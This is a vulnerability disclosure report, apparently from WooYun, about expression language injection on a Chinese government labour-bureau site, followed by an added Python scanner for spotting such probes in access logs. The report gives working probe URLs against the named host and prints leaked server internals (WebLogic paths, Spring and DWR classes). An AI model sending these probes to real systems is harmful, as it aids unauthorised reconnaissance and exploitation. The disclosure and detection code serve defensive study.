Expression language injection
2015-05-15 14:25
Details:

Site: http://www.zjhz.lss.gov.cn/

Test link: http://www.zjhz.lss.gov.cn/html/wsbs/cyxxcx/queryCompCredited.html?year=%24%7b10000-99%7d

Result as shown in the figure:

The test method follows this report: WooYun: "Expression language injection on a Dianping site" | WooYun-2014-71160 | WooYun.org

This should be how it is done, right? (⊙v⊙)

Proof of vulnerability:
http://www.zjhz.lss.gov.cn/html/wsbs/cyxxcx/queryCompCredited.html?year=%24%7b10000-99%7d

view-source:http://www.zjhz.lss.gov.cn/html/wsbs/cyxxcx/queryCompCredited.html?year=${application}

Code area:

```html
<script src="/web/resource/script/list_utf8.js?year=%7Borg.directwebremoting.Container%3Dorg.directwebremoting.impl.DefaultContainer%406f55455e%2C+org.directwebremoting.ContainerList%3D%5Borg.directwebremoting.impl.DefaultContainer%406f55455e%5D%2C+__oscache_cache%3Dcom.opensymphony.oscache.web.ServletCache%406c70a195%2C+__oscache_cache_admin%3Dcom.opensymphony.oscache.web.ServletCacheAdministrator%40b7571b5%2C+weblogic.servlet.WebAppComponentRuntimeMBean%3Dweblogic.servlet.internal.WebAppRuntimeMBeanImpl%4026c66b4a%2C+org.springframework.web.context.WebApplicationContext.ROOT%3Dorg.springframework.web.context.support.XmlWebApplicationContext%4036e79009%3A+display+name+%5BRoot+WebApplicationContext%5D%3B+startup+date+%5BTue+Feb+10+17%3A32%3A25+CST+2015%5D%3B+root+of+context+hierarchy%2C+__oscache_admins%3D%7B__oscache_cache_admin%3Dcom.opensymphony.oscache.web.ServletCacheAdministrator%40b7571b5%7D%2C+org.directwebremoting.WebContextFactory%24WebContextBuilder%3Dorg.directwebremoting.impl.DefaultWebContextBuilder%404ed39061%2C+javax.servlet.context.tempdir%3D%2Fopt%2FMiddleware%2Fuser_projects%2Fdomains%2Fbase_domain%2Fservers%2Fapp1%2Ftmp%2F_WL_user%2Fweb%2Faakfdm%2Fpublic%2C+javax.servlet.ServletConfig%3Dweblogic.servlet.internal.ServletStubImpl%404422e93c+-+dwr-invoker+class%3A+%27uk.ltd.getahead.dwr.DWRServlet%27%2C+freemarker.Configuration%3Dfreemarker.template.Configuration%404b7c27f3%2C+weblogic.servlet.WebAppComponentMBean%3Dweblogic.management.configuration.WebAppComponentMBeanImpl%401a3b23f1%28%5Bbase_domain%5D%2FApplications%5Bweb%5D%2FWebAppComponents%5Bweb%5D%29%2C+org.directwebremoting.impl.ServerContext%3Dorg.directwebremoting.impl.DefaultServerContext%40568074d1%2C+contextConfigLocation%3D%2FWEB-INF%2Fclasses%2FapplicationContext.xml%2C+com.sun.faces.config.WebConfiguration%3Dcom.sun.faces.config.WebConfiguration%4023abf8b5%2C+javax.servlet.http.HttpServlet%3Duk.ltd.getahead.dwr.DWRServlet%404ffe8516%7D"></script>
```

Site: http://survey.dianping.com/
Proof of vulnerability:
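
An added example, not part of the original report: a log scanner a defender could run to find requests like the two probes above, where `year` carries `${10000-99}` (which an evaluating server renders as 9901) or `${application}`. The sample log lines, their IP addresses, and the `SCOPE_NAMES` watch list are constructed assumptions; the scanner goes slightly beyond the report by also undoing nested percent-encoding and matching `#{...}`.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

EL_EXPR = re.compile(r"[$#]\{([^{}]*)\}")          # ${...} and #{...}
ARITH = re.compile(r"^\s*\d+\s*[-+*/%]\s*\d+\s*$")  # e.g. 10000-99
# Assumed watch list of scope/implicit objects; "application" is from the report.
SCOPE_NAMES = {"application", "applicationScope", "sessionScope", "requestScope",
               "pageScope", "pageContext", "param", "header", "cookie", "initParam"}
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def decode_fully(value, rounds=3):
    """Undo nested percent-encoding so %2524%257b... is still seen as ${..."""
    for _ in range(rounds):
        value = unquote(value)
    return value

def classify(body):
    """Label what the expression inside the delimiters is trying to do."""
    if ARITH.match(body):
        return "arithmetic-probe"
    root = re.split(r"[.\[(\s]", body.strip(), maxsplit=1)[0]
    return "scope-object-access" if root in SCOPE_NAMES else "expression"

def scan_url(url):
    """Return (parameter, expression, label) for each EL token in the query."""
    return [(name, m.group(0), classify(m.group(1)))
            for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True)
            for m in EL_EXPR.finditer(decode_fully(value))]

def scan_log(lines):
    """Map line number -> findings for access-log lines that carry EL tokens."""
    hits = {}
    for lineno, line in enumerate(lines, 1):
        m = REQUEST.search(line)
        if m and (found := scan_url(m.group(1))):
            hits[lineno] = found
    return hits

# Constructed sample log (documentation IPs); path and probes mirror the report.
PAGE = "/html/wsbs/cyxxcx/queryCompCredited.html"
SAMPLE_LOG = [
    f'192.0.2.10 - - [15/May/2015:14:01:02 +0800] "GET {PAGE}?year=2014 HTTP/1.1" 200 5120',
    f'192.0.2.44 - - [15/May/2015:14:02:11 +0800] "GET {PAGE}?year=%24%7b10000-99%7d HTTP/1.1" 200 5131',
    f'192.0.2.44 - - [15/May/2015:14:02:40 +0800] "GET {PAGE}?year=${{application}} HTTP/1.1" 200 9310',
    f'192.0.2.44 - - [15/May/2015:14:03:05 +0800] "GET {PAGE}?year=%2524%257b10000-99%257d HTTP/1.1" 200 5131',
]

if __name__ == "__main__":
    print(scan_log(SAMPLE_LOG))
```

A hit only shows that an expression was sent; confirming exposure means checking whether the response contains the evaluated value rather than the literal `${...}` text.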